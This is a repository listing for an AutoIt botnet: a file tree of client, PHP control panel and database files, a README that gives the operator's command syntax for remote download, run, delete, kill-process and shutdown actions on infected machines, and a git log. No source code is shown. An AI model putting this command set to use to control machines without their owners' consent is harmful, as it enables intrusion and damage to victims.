======================: FILES :======================
AutoIT-Botnet
├── client.au3
├── database.sql
├── default.css
├── fonts
│   ├── FontAwesome.otf
│   ├── fontawesome-webfont.eot
│   ├── fontawesome-webfont.svg
│   ├── fontawesome-webfont.ttf
│   └── fontawesome-webfont.woff
├── fonts.css
├── images
│   └── logo.jpg
├── index.php
├── newBot.php
└── README.md

2 directories, 13 files
======================: README CONTENT :======================
# AutoIT-Botnet
When sending commands make sure that the selected command name precedes the input

# Commands
Run? <location>

Download? <url> ? <location>

Visit? <url>

Kill? <process name>

Delete? <location>

Box? <title> ? <message>
  
Shutdown

Restart

Lock computer

Unlock computer

Beep computer

Open CD Drive

Close CD Drive

Uninstall
====================== GIT HISTORY: ======================
4cda594 HEAD@{0}: clone: from https://github.com/bdunlap9/AutoIT-Botnet
commit 4cda594fce2488c20f856a931ad522439981ac37
Author: Weeke <baileydunlap9@gmail.com>
Date:   Sat Jan 20 09:33:36 2018 -0800

    Update client.au3

commit 8db7449394865f7a19db9e0271be8c4aafb5f425
Author: Weeke <baileydunlap9@gmail.com>
Date:   Sat Jan 20 09:32:24 2018 -0800

    Update README.md

commit 15c8125a857d01a6d3252dc1e6b5cbcb6a5bf11a
Author: Weeke <baileydunlap9@gmail.com>
Date:   Sat Jan 20 09:29:33 2018 -0800

    Update README.md

commit 4554015d5bacbfa01b2108f27f805555ba1d95e2
Author: Weeke <baileydunlap9@gmail.com>
Date:   Sat Jan 20 09:29:11 2018 -0800

    Update README.md

commit a6fafd4dec56da985b08ba7085416f68e205f7b7
Author: Weeke <baileydunlap9@gmail.com>
Date:   Sat Jan 20 09:25:57 2018 -0800

    Add files via upload

commit 4be3dd01b2437a06b2aa01a7adb876fddd57ffd4
Author: Weeke <baileydunlap9@gmail.com>
Date:   Sat Jan 20 09:23:55 2018 -0800

    Initial commit
